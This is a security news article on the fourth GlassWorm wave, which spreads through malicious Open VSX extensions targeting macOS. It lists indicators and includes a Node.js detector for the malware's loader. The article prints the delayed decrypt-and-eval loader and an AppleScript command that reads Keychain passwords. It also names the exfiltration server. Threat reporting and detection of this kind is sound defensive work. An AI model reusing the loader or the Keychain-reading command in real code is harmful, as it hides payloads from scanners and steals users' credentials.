A new wave of GlassWorm malware has emerged, marking a major shift in targeting from Windows to macOS systems. This self-propagating worm, distributed through malicious VS Code extensions on the Open VSX marketplace, has already amassed over 50,000 downloads.
The fourth wave introduces several concerning changes, including encrypted payloads, hardware wallet trojanization capabilities, and sophisticated sandbox evasion techniques that allow it to bypass conventional security scanning tools.
The threat actor behind GlassWorm has proven remarkably adaptive, evolving through four distinct waves since October. Earlier campaigns relied on invisible Unicode characters and compiled Rust binaries to hide malicious code.
The latest iteration abandons these approaches in favor of AES-256-CBC encrypted JavaScript payloads specifically engineered for macOS environments.
Prettier Pro on open-vsx (Source – Koi)
Three suspicious extensions have been flagged on the Open VSX marketplace: pro-svelte-extension, vsce-prettier-pro, and full-access-catppuccin-pro-extension, all linked by shared infrastructure and encryption keys.
The malware employs Solana blockchain-based command-and-control infrastructure that makes takedown efforts nearly impossible.
By posting transaction memos containing base64-encoded URLs to the blockchain, the attacker maintains decentralized control that cannot be disrupted by conventional domain blocking.
Researchers traced the infrastructure to IP address 45.32.151.157, which was also used in the third wave, confirming continuity of the threat actor.
Koi analysts identified the malware through behavioral analysis after their threat engine detected unusual patterns in extension behavior and network communications.
Encrypted Payload and Sandbox Evasion Tactics
The fourth wave introduces a clever timing mechanism designed to evade automated security analysis. Once installed, the malicious extension waits exactly 15 minutes before executing its payload.
This delay is critical because most sandbox environments time out after 5 minutes, meaning the malware appears completely benign during automated scanning.
The code contains a hardcoded value of 9e5 milliseconds (900,000 milliseconds equals 15 minutes), which triggers the decryption and execution of the AES-256-CBC encrypted payload.
setTimeout(() => {
  const decrypted = crypto.createDecipheriv('aes-256-cbc', key, iv);
  let payload = decrypted.update(encryptedData, 'base64', 'utf8');
  payload += decrypted.final('utf8');
  eval(payload);
}, 9e5);
Encrypted payload execution (Source – Koi)
The payload itself is embedded at line 64 of the main extension file, encrypted with a hardcoded key and initialization vector that remain constant across all three malicious extensions.
This shared cryptographic infrastructure confirms a single threat actor is responsible for the campaign.
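The loader pattern described above (a setTimeout delay longer than a sandbox's timeout, wrapping AES-256-CBC decryption that feeds eval) is easy to check for in an extension's main file. The following Node.js scanner is an added example written for this article, not Koi's tooling or anything from the extensions themselves; the sample source it analyzes is constructed to mirror the snippet shown above, with placeholder key, IV and ciphertext names.

```javascript
// Added example (not Koi's code): heuristic scan of a VS Code extension's main
// source for the GlassWorm wave-4 loader pattern and the indicators the article names.

// Indicators quoted in the article; SANDBOX_TIMEOUT_MS is the 5-minute limit it cites.
const SUSPECT_NAMES = ['pro-svelte-extension', 'vsce-prettier-pro', 'full-access-catppuccin-pro-extension'];
const SUSPECT_STRINGS = ['45.32.151.157', '45.32.150.251', '/tmp/ijewf/'];
const SANDBOX_TIMEOUT_MS = 5 * 60 * 1000;

// Returns every numeric delay passed as the last argument of setTimeout(...).
// Brackets are matched by depth counting (string contents are not parsed; this is a
// heuristic), and Number() accepts exponent forms such as the article's 9e5.
function setTimeoutDelays(src) {
  const delays = [];
  let idx = 0;
  while ((idx = src.indexOf('setTimeout', idx)) !== -1) {
    const open = src.indexOf('(', idx);
    if (open === -1) break;
    let depth = 0, lastComma = -1, i = open;
    for (; i < src.length; i++) {
      const c = src[i];
      if ('({['.includes(c)) depth++;
      else if (')}]'.includes(c) && --depth === 0) break;
      else if (c === ',' && depth === 1) lastComma = i;
    }
    const ms = lastComma === -1 ? NaN : Number(src.slice(lastComma + 1, i).trim());
    if (Number.isFinite(ms)) delays.push(ms);
    idx = i;
  }
  return delays;
}

// Classifies one extension by name and main-file source. A long delay alone is not
// flagged; the delay combined with decrypt-then-eval is the sandbox-evading loader.
function analyzeExtension(name, src) {
  const reasons = [];
  if (SUSPECT_NAMES.includes(name)) reasons.push('extension name matches a wave-4 indicator');
  for (const s of SUSPECT_STRINGS) if (src.includes(s)) reasons.push(`hardcoded indicator ${s}`);
  const longest = Math.max(0, ...setTimeoutDelays(src));
  const decrypt = /createDecipheriv\s*\(\s*['"]aes-256-cbc['"]/.test(src);
  const dynExec = /\beval\s*\(|new\s+Function\s*\(/.test(src);
  if (longest >= SANDBOX_TIMEOUT_MS && decrypt && dynExec) {
    reasons.push(`delayed loader: ${longest / 60000} min setTimeout, AES-256-CBC decrypt, eval`);
  }
  return { name, suspicious: reasons.length > 0, reasons };
}

// Constructed sample mirroring the loader in the article (key, iv, encryptedData are placeholders).
const SAMPLE_LOADER = `const crypto = require('crypto');
setTimeout(() => {
  const decrypted = crypto.createDecipheriv('aes-256-cbc', key, iv);
  let payload = decrypted.update(encryptedData, 'base64', 'utf8');
  payload += decrypted.final('utf8');
  eval(payload);
}, 9e5);`;
console.log(analyzeExtension('vsce-prettier-pro', SAMPLE_LOADER));
```

To run it over an installed set, read each package.json under the extensions directory and pass its name and the contents of its main file to analyzeExtension.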
After the delay period expires, the malware retrieves the current command-and-control endpoint from the Solana blockchain and executes any instructions it receives.
The macOS-specific payload includes AppleScript for stealth execution, LaunchAgents for persistence rather than Windows Registry keys, and direct access to the macOS Keychain database to retrieve stored passwords and credentials.
set keychainPassword to do shell script "security find-generic-password -s 'password_service' -w"
The malware also includes the capability to replace hardware wallet applications with trojanized versions, targeting both Ledger Live and Trezor Suite.
While the wallet replacement functionality was not fully active during testing on December 29, 2025, the code infrastructure is complete and awaiting payload uploads.
The malware validates that downloaded files exceed 1000 bytes before installation, preventing broken installations that might alert victims.
All stolen data gets staged in the temporary directory /tmp/ijewf/, compressed, and sent to the exfiltration server at 45.32.150.251/p2p for attacker retrieval.
